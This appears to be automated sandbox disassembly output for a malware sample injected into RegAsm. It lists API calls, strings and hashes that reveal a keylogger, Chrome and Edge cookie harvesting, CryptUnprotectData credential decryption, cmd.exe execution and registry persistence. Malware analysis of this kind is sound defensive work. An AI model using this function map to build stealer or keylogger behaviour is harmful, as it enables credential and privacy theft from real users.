                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6CCF8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                • String ID: /sort "Visit Time" /stext "$0NG
                                                                • API String ID: 368326130-3219657780
                                                                • Opcode ID: 954e782024b67c864ede7c4510563d62e1992c79ce0d6a0ea0cfeeaa97580bb4
                                                                • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                • Opcode Fuzzy Hash: 954e782024b67c864ede7c4510563d62e1992c79ce0d6a0ea0cfeeaa97580bb4
                                                                • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 00416330
                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcslen$CloseCreateValue
                                                                • String ID: !D@$okmode$PG
                                                                • API String ID: 3411444782-3370592832
                                                                • Opcode ID: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                                • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                • Opcode Fuzzy Hash: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                                • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                APIs
                                                                  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                Strings
                                                                • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                • API String ID: 1174141254-1980882731
                                                                • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                APIs
                                                                  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                Strings
                                                                • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                • API String ID: 1174141254-1980882731
                                                                • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                • wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EventLocalTimewsprintf
                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                • API String ID: 1497725170-1359877963
                                                                • Opcode ID: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                                • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                • Opcode Fuzzy Hash: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                                • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                APIs
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                • String ID: Online Keylogger Started
                                                                • API String ID: 112202259-1258561607
                                                                • Opcode ID: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                                • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                • Opcode Fuzzy Hash: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                                • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: CryptUnprotectData$crypt32
                                                                • API String ID: 2574300362-2380590389
                                                                • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                • String ID: Connection Timeout
                                                                • API String ID: 2055531096-499159329
                                                                • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                APIs
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Exception@8Throw
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 2005118841-1866435925
                                                                • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                APIs
                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,004752D8), ref: 00413888
                                                                • RegCloseKey.ADVAPI32(004752D8,?,0040F85E,pth_unenc,004752D8), ref: 00413893
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID: pth_unenc
                                                                • API String ID: 1818849710-4028850238
                                                                • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                • String ID: bad locale name
                                                                • API String ID: 3628047217-1405518554
                                                                • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                • SetForegroundWindow.USER32 ref: 00416CA8
                                                                  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                • String ID: !D@
                                                                • API String ID: 3446828153-604454484
                                                                • Opcode ID: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                • Opcode Fuzzy Hash: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID: /C $cmd.exe$open
                                                                • API String ID: 587946157-3896048727
                                                                • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                APIs
                                                                • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                • String ID: pth_unenc
                                                                • API String ID: 3123878439-4028850238
                                                                • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetLastInputInfo$User32.dll
                                                                • API String ID: 2574300362-1519888992
                                                                • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __alldvrm$_strrchr
                                                                • String ID:
                                                                • API String ID: 1036877536-0
                                                                • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                • Opcode Fuzzy Hash: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                                • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DDB
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                • String ID:
                                                                • API String ID: 3360349984-0
                                                                • Opcode ID: 3cc4a22492a47db64547c4b8535c962fb2b7a00fbf8ffb9522a706fb9bc5eda2
                                                                • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                • Opcode Fuzzy Hash: 3cc4a22492a47db64547c4b8535c962fb2b7a00fbf8ffb9522a706fb9bc5eda2
                                                                • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                APIs
                                                                Strings
                                                                • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                • API String ID: 3472027048-1236744412
                                                                • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                APIs
                                                                  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                  • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                                • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$SleepText$ForegroundLength
                                                                • String ID: [ $ ]
                                                                • API String ID: 3309952895-93608704
                                                                • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                                • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                • Opcode Fuzzy Hash: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                                • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                                • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                • Opcode Fuzzy Hash: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                                • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad$ErrorLast
                                                                • String ID:
                                                                • API String ID: 3177248105-0
                                                                • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
